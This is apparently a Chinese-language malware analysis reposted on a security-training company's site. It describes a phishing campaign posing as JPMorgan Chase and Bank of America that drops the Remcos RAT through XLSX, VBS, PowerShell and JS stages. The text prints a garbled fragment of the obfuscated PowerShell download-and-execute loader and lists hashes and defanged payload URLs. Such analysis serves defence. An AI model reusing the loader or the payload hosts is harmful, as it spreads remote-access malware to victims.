联系电话
QQ客服
发布时间:2022-01-28
简要描述:
近日,研究人员发现大量假借摩根大通银行和美国银行名义散发的钓鱼邮件,附件中会包含银行的名称和徽标。摩根大通银行美国银行该恶意 XLSX 文件(c70048c0a6636b934623cebe544300...
近日,研究人员发现大量假借摩根大通银行和美国银行名义散发的钓鱼邮件,附件中会包含银行的名称和徽标。
摩根大通银行
美国银行
该恶意 XLSX 文件(c70048c0a6636b934623cebe544300c9a950c7bdd542ebe1b6dd06498ca1b915)会在启动时执行以下代码以加载第一阶段的 Payload。代码首先检查是否能够联网,接着下载并执行 Payload(3cc322e6044691b7b2ce8937d90dccf0cb6b6692cbee40742356777762c2cc71)。
ping google.com;b4df='olnwoD.)tnei' + 'lCb'; ,''gv6BNpMg30gwvPA=yekhtuac3,we22 -Join '';IEX(([regex]::Matches(env:temp+ '\twt.vbs')
第一阶段的 Payload 会加载下一阶段的 Payload,脚本使用了较为简单的方法(字符转十六进制)来隐藏下一阶段的恶意 URL。
tweet.vs
下载的 Payload 会被写入注册表并在系统重启时启动恶意软件。
tvt.vbs
第二阶段
第二阶段的 Payload 是 PowerShell 脚本:
PowerShell 脚本
攻击链的最后是一个 .js 脚本( ef3e6b1fb39341321591d2df51a29ff0365d5e997bcb7a10f4f1fbcd1a8468dd),其中包含一个可执行库文件。下图可见,代码中增加了许多垃圾内容进行混淆,在运行时用零替换不必要的字符串再启动动态链接库。
.JS 文件
提取数据后可以得到一个使用 C# 编写的可执行库文件,这就是最后投递的恶意样本( b7fd83f6d8bbd17d4aefa8f4e28d4503f1c4ab6ab70401b1a67e209da6197cde、73ee036d191c9b2d717e94b2bae87622fce097a42d61594ee8cc1ab5b92749f1)。
该文件是 Remcos RAT 远控木马,攻击者可以通过该恶意软件获取未授权的远程访问能力。
c70048c0a6636b934623cebe544300c9a950c7bdd542ebe1b6dd06498ca1b91587d78153d9d87c7e7e130feb052b1059837dcf6ebe0a128b75be75062ee11f9fd874fc97e460e2c147782581d320f1673780ee99246286ce9d248c2a20a987737e97a402dfea6b367245ba7a7b7e9811a867e23d4a339f14f79a7420b5b6f5a6b1df072eba923c472e461200b35823fde7f8e640bfb468ff5ac707369a2fa35ee37875bf204cb272dc38240363cc1e75929104b61ca0143441062b461ea8ce1f08a1259090d5bf015cfd80caa7ac3ff5060ad503825ea5a5f010cec03178c157hxxp://104.223.119.167/calient.jpghxxp://104.223.119.167/han.jpghxxp://64.188.19.241/na.jpghxxp://64.188.19.241/atc.jpghxxp://64.188.19.241/rtc.jpghxxp://64.188.19.241/ghini.vbs
INQUEST
上一篇:CVE-2021-34486 ETW权限提升漏洞分析
下一篇:RiotPot:一个针对IoT和OT的弹性蜜罐安全系统
黑客技术培训
网络运维培训班
黑客技术专业培训
网络安全工程师培训
如果您有任何问题,请跟我们联系!
联系我们
Copyright © 武汉网盾科技有限公司 版权所有 备案号:鄂ICP备2023003462号-5
地址:联系地址:湖北省武汉市东湖新技术开发区武大科技园兴业楼北楼1单元2层
咨询在线客服
服务热线
15527777548/18696195380
扫一扫,关注我们